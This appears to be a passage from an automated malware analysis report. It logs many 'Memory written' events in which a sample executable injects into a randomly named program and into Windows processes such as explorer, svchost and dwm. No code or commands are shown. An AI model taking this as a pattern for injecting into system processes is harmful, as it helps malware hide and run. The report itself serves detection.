        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1060000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 580000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 520000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 530000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 4F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 500000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1140000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1150000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 3C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1040000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1320000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1330000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 750000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1020000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1430000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 700000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 840000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 1220000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D50000Jump to behavior
